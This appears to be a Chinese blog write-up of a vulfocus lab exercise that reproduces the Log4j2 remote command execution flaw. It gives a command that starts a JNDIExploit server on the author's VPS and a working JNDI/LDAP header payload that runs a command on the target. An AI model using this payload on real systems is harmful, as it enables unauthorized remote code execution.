vulfocus复现:Log4j2远程命令执行2
1.开启靶机环境并访问
2.使用JNDIExploit.v1.2在自己的vps上开启服务
工具下载:
链接:https://pan.baidu.com/s/1oCfHPw-mMBPDDjNy-RO1YA
提取码:4x5j
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx(vps公网IP) -l 1234 -p 2345
3.抓包填写payload,获得flag
payload:
X-Api-Version:${jndi:ldap://xx.xx.xx.xx:1234/TomcatBypass/TomcatEcho}
Content-Type:application/x-www-from-urlencoded
Cmd:ls /tmp
完成
如果可以帮助到你,劳烦点点赞哦!
声明: 本文章仅供学习使用,不得用于未授权的渗透测试,禁止用于非法用途。
vulfocus复现:Log4j2远程命令执行2相关推荐
- Log4j2远程命令执行(CVE-2021-44228)复现
漏洞说明 Log4j是Apache的开源日志记录组件.Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性.该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息. 由 ...
- Log4j2远程命令执行2-vulfocus-wp
vulfocus:log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 1.首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境:(Log4j2-Exp工具 ...
- 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run t ...
- CVE-2021-22205 Gitlab exiftool远程命令执行 复现
1 漏洞信息 漏洞名称 Gitlab exiftool远程命令执行漏洞 漏洞编号 CVE-2021-22205 危害等级 高危 CVSS评分 7.5 漏洞类型 中间件漏洞 漏洞厂商 GitLab 漏洞 ...
- Axis1.4 远程命令执行(CVE-2019-0227)复现
一.漏洞介绍 漏洞本质是管理员对AdminService的配置错误.当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的temp ...
- PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...
- 开源堡垒机JumpServer远程命令执行漏洞复现
声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...
- 华为路由器远程命令执行漏洞复现(CVE-2017-17215)
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...
- Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析
Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...
最新文章
- 关于MSSQL导入导出时主键与约束丢失的问题解决
- 【Java 网络编程】TCP 简介
- python自动测试g_Python自动化测试如何自动生成测试用例?
- SAP 与 JSON 接口实施案例二
- 区块链学堂(3):Solidity
- C语言数据结构编程实列,数据结构C语言实现----栈的实例
- Confluence5.8部分空间名称显示为问号的解决方案
- php自动提交百度收录,wordpress站点如何自动提交百度收录
- 汽车故障检测软件_检测认证事业部软件测评公司党支部与汽车测评管理中心党支部开展党建共建活动...
- document.execCommand
- 关于LAMP配置Let’s Encrypt SSL证书
- 第五团队谷歌浏览器软件与用户体验调查与分析
- PyTorch载入图片ToTensor,PIL和OpenCV读取图片plt.imread和PIL.Image.open
- mysql数据库基本知识点整理笔记
- windows11安装MAVEN
- 物联网-米思齐-Mixly-RFID智能门禁
- 新操作系统有哪些新功能?一起来看看吧!
- 我的音乐(Musicoco)- 本地音乐播放器开发总结
- Apache AzKaban 环境搭建与入门使用
- Quick-cocos2d-x 与COCOS2DX 区别